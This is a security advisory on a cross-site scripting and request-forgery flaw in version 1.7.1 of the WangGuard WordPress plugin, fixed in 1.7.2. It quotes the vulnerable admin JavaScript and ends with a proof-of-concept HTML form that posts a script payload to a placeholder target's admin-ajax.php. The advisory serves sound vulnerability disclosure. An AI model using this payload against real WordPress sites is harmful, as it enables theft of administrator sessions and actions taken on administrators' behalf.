Cross-Site Scripting in WangGuard WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the WangGuard WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

OVE ID

OVE-20160724-0030

Tested versions

This issue was successfully tested on WangGuard WordPress Plugin version 1.7.1.

Fix

This issue is resolved in WangGuard version 1.7.2.

Introduction

The WangGuard WordPress Plugin protects against sploggers and spam users registration. A Cross-Site Scripting vulnerability was found in the WangGuard WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.

Details

The issue exists in the file wangguard-admin.php and is caused by the lack of output encoding on the security questions & answers. It should be noted that this functionality is also vulnerable to Cross-Site Request Forgery.

jQuery("#wangguardnewquestionbutton").click(function() {
	jQuery("#wangguardnewquestionerror").hide();
	var wgq = jQuery("#wangguardnewquestion").val();
	var wga = jQuery("#wangguardnewquestionanswer").val();
	if ((wgq=='') || (wga=='')) {
		jQuery("#wangguardnewquestionerror").slideDown();
		return;
	}
	data = {
		action	: 'wangguard_ajax_questionadd',
		q		: wgq,
		a		: wga
	};
	jQuery.post(ajaxurl, data, function(response) {
		if (response!='0') {
			jQuery("#wangguard-question-noquestion").remove();
			var newquest = '<div class="wangguard-question" id="wangguard-question-'+response+'">';
			newquest += '<?php  echo addslashes(__("Question", 'wangguard')) ?>: <strong>'+**wgq**+'</strong><br/>';
			newquest += '<?php  echo addslashes(__("Answer", 'wangguard')) ?>: <strong>'+**wga**+'</strong><br/>';
			newquest += '<a href="javascript:void(0)" rel="'+response+'" class="wangguard-delete-question"><?php  echo addslashes(__('delete question', 'wangguard')) ?></a></div>';
			jQuery("#wangguard-new-question-container").append(newquest);
			jQuery("#wangguardnewquestion").val("");
			jQuery("#wangguardnewquestionanswer").val("");
		}
		else if (response=='0') {
			jQuery("#wangguardnewquestionerror").slideDown();
		}
	});
});

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="wangguard&#95;ajax&#95;questionadd" />
			<input type="hidden" name="q" value="xss&#63;" />
			<input type="hidden" name="a" value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

Vragen of feedback?